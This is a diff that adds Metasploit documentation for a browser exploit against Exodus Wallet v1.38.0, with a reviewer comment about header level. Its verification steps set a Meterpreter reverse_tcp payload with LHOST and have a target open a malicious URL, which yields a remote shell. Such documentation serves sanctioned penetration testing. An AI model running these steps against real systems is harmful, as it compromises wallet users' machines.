documentation/modules/exploit/windows/browser/exodus.md

```diff
@@ -0,0 +1,45 @@
+
+## Verification Steps
+1. Install Exodus Wallet version `v1.38.0`
+2. Start `msfconsole`
+3. Do `use exploit/windows/browser/exodus`
+4. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
+5. Do `set LHOST ip`
+6. Do `exploit`
+7. In the target machine browse to the malicious URL an launch Exodus
+8. Verify the Meterpreter session is opened
+
+## Scenarios
+
+# Exodus Wallet on Windows 7 SP1
```

Comment:
Please add the version of exodus wallet to the header.  It should also be 3 levels deep not 1 (```###```)